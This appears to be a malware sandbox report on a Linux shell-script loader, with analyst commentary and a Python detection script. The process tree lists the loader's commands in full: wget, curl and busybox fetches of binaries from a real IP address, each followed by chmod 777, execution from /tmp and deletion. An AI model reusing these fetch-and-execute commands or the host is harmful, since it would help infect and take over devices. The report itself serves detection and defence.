Analysis
-
max time kernel
9s
-
max time network
41s
-
platform
debian-9_armhf
-
resource
debian9-armhf-20240611-en
-
resource tags
arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system
submitted
21/11/2024, 04:06
Static task
static1
Behavioral task
behavioral1
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
-
Size
10KB
-
MD5
2c8ee73ff481383ca124810fef8653b1
-
SHA1
2f0045a1346635e0b97b189a217d60329572ee9c
-
SHA256
2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94
-
SHA512
a4cf9a0c5f3fcb4bbc802490023c07e2cdfe73a8a6d3d4903e7e952967325270f6f4a0bf912b58844b8655e30ba7832a39dc377a73ed4443b77740b6584ad8ad
-
SSDEEP
192:mrPM5ZTjn81dBLvdLvgaD6DGDN2uVFxFxFcj/flNzu7ui07gQ27wgRNKW5z7MUzm:jiC2N2uKu4OxTHC2N2uwCo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 6 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
673  chmod
684  chmod
692  chmod
707  chmod
723  chmod
739  chmod
-
Executes dropped EXE 6 IoCs
ioc                                       pid  Process
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY   675  jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD   685  vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa   693  vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx   709  I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL   724  MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I   741  zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
-
Checks CPU configuration 1 TTPs 6 IoCs
Checks CPU information that can indicate whether the system is a virtual machine.
Every hit in this signature and in the next one is attributed to curl, not to the dropped binaries. Crypto and TLS libraries commonly read /proc/cpuinfo and /proc/self/auxv at start-up to detect CPU features (HWCAP) and /proc/sys/crypto/fips_enabled to check the kernel FIPS flag, so on their own these hits are a library start-up artifact of the download tool, not evidence of sandbox evasion by the loader or its payloads.
description              ioc            Process
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
-
Reads runtime system information 12 IoCs
description              ioc                            Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
File opened for reading  /proc/self/auxv                curl
-
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description                   ioc                                       Process
File opened for modification  /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY   curl
File opened for modification  /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD   curl
File opened for modification  /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa   curl
File opened for modification  /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx   curl
File opened for modification  /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL   curl
File opened for modification  /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I   curl
Processes
-
PID  Executable  Command line (child processes indented; signature hits listed under the process)
PID:645  /tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh  /tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh
    PID:647  /bin/rm  rm bins.sh
    PID:649  /usr/bin/wget  wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
    PID:660  /usr/bin/curl  curl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
        - Checks CPU configuration
        - Reads runtime system information
        - Writes file to tmp directory
    PID:670  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
    PID:673  /bin/chmod  chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
        - File and Directory Permissions Modification
    PID:675  /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY  ./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
        - Executes dropped EXE
    PID:676  /bin/rm  rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
    PID:678  /usr/bin/wget  wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
    PID:681  /usr/bin/curl  curl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
        - Checks CPU configuration
        - Reads runtime system information
        - Writes file to tmp directory
    PID:683  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
    PID:684  /bin/chmod  chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
        - File and Directory Permissions Modification
    PID:685  /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD  ./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
        - Executes dropped EXE
    PID:686  /bin/rm  rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
    PID:687  /usr/bin/wget  wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
    PID:688  /usr/bin/curl  curl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
        - Checks CPU configuration
        - Reads runtime system information
        - Writes file to tmp directory
    PID:689  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
    PID:692  /bin/chmod  chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
        - File and Directory Permissions Modification
    PID:693  /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa  ./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
        - Executes dropped EXE
    PID:694  /bin/rm  rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
    PID:695  /usr/bin/wget  wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
    PID:700  /usr/bin/curl  curl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
        - Checks CPU configuration
        - Reads runtime system information
        - Writes file to tmp directory
    PID:704  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
    PID:707  /bin/chmod  chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
        - File and Directory Permissions Modification
    PID:709  /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx  ./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
        - Executes dropped EXE
    PID:710  /bin/rm  rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
    PID:711  /usr/bin/wget  wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
    PID:715  /usr/bin/curl  curl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
        - Checks CPU configuration
        - Reads runtime system information
        - Writes file to tmp directory
    PID:719  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
    PID:723  /bin/chmod  chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
        - File and Directory Permissions Modification
    PID:724  /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL  ./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
        - Executes dropped EXE
    PID:726  /bin/rm  rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
    PID:727  /usr/bin/wget  wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
    PID:731  /usr/bin/curl  curl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
        - Checks CPU configuration
        - Reads runtime system information
        - Writes file to tmp directory
    PID:736  /bin/busybox  /bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
    PID:739  /bin/chmod  chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
        - File and Directory Permissions Modification
    PID:741  /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I  ./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
        - Executes dropped EXE
    PID:742  /bin/rm  rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
    PID:743  /usr/bin/wget  wget http://87.120.125.191/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
-
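The process tree above is the whole behaviour of this sample on the debian9-armhf task: for each name under /bins/ on 87.120.125.191 the script tries wget, then curl -O, then busybox wget, marks the result world-writable and executable with chmod 777, runs it from /tmp, deletes it and moves on to the next name. Only curl is credited with the /tmp writes in the signatures, and the trace ends on a seventh wget with no further steps. The file names are random, so a detection keyed on them will not survive the next campaign; the chain itself (three fallback fetchers, chmod with an exec bit, execution from /tmp, immediate rm) is the durable signal. The script below is an added example, not code from the sandbox or from the sample: it walks an event list constructed from the tree above (two complete cycles plus the trailing fetch; the event tuples and all function names are my own) and reports which names completed the fetch, chmod, exec chain, which were only fetched, and the host they came from.

```python
"""Flag the fetch -> chmod -> execute -> delete loader loop in a sandbox
process tree and extract its indicators (C2 host, URLs, dropped names).

Added example for this report; not code from the sandbox or the sample.
The EVENTS list is constructed from the process tree above."""
import re
import shlex
from dataclasses import dataclass, field
from os.path import basename
from urllib.parse import urlparse

C2 = "http://87.120.125.191/bins/"
SCRIPT = "/tmp/2efc3a0b95b0f47a391caeea7d0be6103ec13b915886586598849bb1a6a79d94.sh"

# (pid, executable, command line), as the sandbox tree renders them.
EVENTS = [
    (645, SCRIPT, SCRIPT),
    (647, "/bin/rm", "rm bins.sh"),
    (649, "/usr/bin/wget", "wget " + C2 + "jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY"),
    (660, "/usr/bin/curl", "curl -O " + C2 + "jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY"),
    (670, "/bin/busybox", "/bin/busybox wget " + C2 + "jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY"),
    (673, "/bin/chmod", "chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY"),
    (675, "/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY", "./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY"),
    (676, "/bin/rm", "rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY"),
    (678, "/usr/bin/wget", "wget " + C2 + "vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD"),
    (681, "/usr/bin/curl", "curl -O " + C2 + "vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD"),
    (683, "/bin/busybox", "/bin/busybox wget " + C2 + "vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD"),
    (684, "/bin/chmod", "chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD"),
    (685, "/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD", "./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD"),
    (686, "/bin/rm", "rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD"),
    (743, "/usr/bin/wget", "wget " + C2 + "ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo"),
]

URL_RE = re.compile(r"https?://\S+")
FETCHERS = {"wget", "curl", "busybox wget"}


@dataclass
class Payload:
    """State accumulated for one dropped file name while walking the tree."""
    urls: set = field(default_factory=set)
    fetch_tools: set = field(default_factory=set)
    made_executable: bool = False
    executed: bool = False
    removed: bool = False

    def full_chain(self) -> bool:
        return bool(self.urls) and self.made_executable and self.executed


def grants_exec(mode: str) -> bool:
    """True if a chmod mode sets any execute bit: 777, 755, +x, a+x ..."""
    if mode.isdigit():
        return bool(int(mode, 8) & 0o111)
    return "x" in mode and "-x" not in mode


def analyze(events):
    """Return ({file name: Payload}, {hosts fetched from}) for the events."""
    payloads, hosts = {}, set()
    for _pid, exe, cmdline in events:
        argv = shlex.split(cmdline)
        if not argv:
            continue
        tool = basename(argv[0])
        if tool == "busybox" and len(argv) > 1:   # applet call: busybox wget URL
            tool = "busybox " + argv[1]
        if tool in FETCHERS:
            for url in URL_RE.findall(cmdline):
                name = basename(urlparse(url).path)
                p = payloads.setdefault(name, Payload())
                p.urls.add(url)
                p.fetch_tools.add(tool)
                hosts.add(urlparse(url).netloc)
        elif tool == "chmod" and len(argv) >= 3 and grants_exec(argv[1]):
            for target in argv[2:]:
                payloads.setdefault(basename(target), Payload()).made_executable = True
        elif tool == "rm":
            for target in argv[1:]:
                if basename(target) in payloads:
                    payloads[basename(target)].removed = True
        elif exe.startswith("/tmp/") and basename(exe) in payloads:
            payloads[basename(exe)].executed = True   # ./name launched from /tmp
    return payloads, hosts


def findings(events):
    """Summarise which names completed fetch->chmod->exec and which were only fetched."""
    payloads, hosts = analyze(events)
    return {
        "c2_hosts": sorted(hosts),
        "full_chain": sorted(n for n, p in payloads.items() if p.full_chain()),
        "fetch_only": sorted(n for n, p in payloads.items()
                             if p.urls and not (p.made_executable or p.executed)),
        "urls": sorted(u for p in payloads.values() for u in p.urls),
    }


if __name__ == "__main__":
    for key, value in findings(EVENTS).items():
        print(key, value)
```

Fed from auditd execve records or the sandbox's JSON instead of the constructed list, the same walk fires on any loader of this shape regardless of file names or C2 address, and the "fetch_only" bucket is worth alerting on too: it is what the trace looks like when the download fails or, as with the last wget here, the run is cut off. Mounting /tmp noexec breaks the exec step of this chain outright, which is why the chmod and exec events are the ones to watch rather than the downloads.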
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97